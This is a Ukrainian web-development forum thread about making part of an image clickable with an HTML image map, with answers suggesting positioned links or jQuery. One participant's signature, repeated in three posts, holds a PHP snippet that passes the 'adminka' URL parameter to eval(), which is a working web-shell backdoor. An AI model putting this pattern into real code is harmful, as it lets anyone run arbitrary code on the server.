1 Востаннє редагувалося Faraon (03.03.2014 16:36:50)

Тема: Установка координат картинки

Привіт всім форумчанам (тільки форумчанам! іншим НІ) :)
На картинці яку я прикріпив в верхньому лівому кутку є приблизно відмічена область яку потрібно зробити силкою.
Я зробив ось так:

<map name="box">
 <area shape="circle" coords="120,80,200" href="../game.php?go=map" title="Красный">
 <area shape="circle" coords="50,50,25" href="#" title="Синий">
 <area shape="circle" coords="50,50,25" href="#" title="Зеленый">
 <area shape="circle" coords="50,50,25" href="#" title="Желтый">
 </map>
     <img src="../images/svitovamapa.png" usemap="box" style=" width: 100% ; height: 100%;">

І все працює, але виникло два питання.
1) Як можна зробити таку саму фішку, але іншим способом ? Тому що мій варіант в інтернет експлорері не працює, а мені б хотілося щоб він і там працював.
2) За допомогою якого атрибута можна виділити де саме проходять координати? (виділити область яка є силкою)

Post's attachments

Screenshot_1.png 1.48 mb, 38 downloads since 2014-03-03 

2

Re: Установка координат картинки

Немає ніякої картинки.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: koala1

3

Re: Установка координат картинки

<img><a></a>

зробити позиціонування посилання над картинокю. Правда розмір тегу з посиланням може бути тільки 4рикутник
(як варіант можна через jquery визначати коориданти миші над картинкою і якщо вони попадають в область тоді виконювати певну дію при події onclick

Подякували: Faraon1

4

Re: Установка координат картинки

Invader написав:

Немає ніякої картинки.

Упс... вибачте! (Картинку додав)

5

Re: Установка координат картинки

funivan написав:
<img><a></a>

зробити позиціонування посилання над картинокю. Правда розмір тегу з посиланням може бути тільки 4рикутник
(як варіант можна через jquery визначати коориданти миші над картинкою і якщо вони попадають в область тоді виконювати певну дію при події onclick

Дякую! Думаю на початок підійде і позиціювання силки над картинкою. Звичайно через jquery було б набагато краще але я через jquery невмію! Тому на початок зроблю через посилання.
А що можна зробити з тим що в експлорері це не працює?! Може є інший спосіб як зробити частину картинки посиланням?

6 Востаннє редагувалося Invader (03.03.2014 18:29:40)

Re: Установка координат картинки

Може є інший спосіб як зробити частину картинки посиланням?

Може якийсь формат таке і дозволяє.

А що можна зробити з тим що в експлорері це не працює?!

Покажіть код. CSS & JavaScript.

Звичайно через jquery було б набагато краще але я через jquery невмію!

Вивчіть. Це набагато спростить вам життя тим більше що розбиратися зі способами обходу несумісності між броузерами вам, скоріш за, не захочеться і не стане сил.

PS Ну і HTML теж.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

7 Востаннє редагувалося Faraon (03.03.2014 19:48:20)

Re: Установка координат картинки

Покажіть код. CSS & JavaScript.

який код? при чому тут css ??? (я не знав що ще потрібно css застосовувати)

Вивчіть. Це набагато спростить вам життя тим більше що розбиратися зі способами обходу несумісності між броузерами вам, скоріш за, не захочеться і не стане сил.

PS Ну і HTML теж.

Ви хочете сказати що мені не стане сил вивчити jquery ????

8

Re: Установка координат картинки

Ні.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!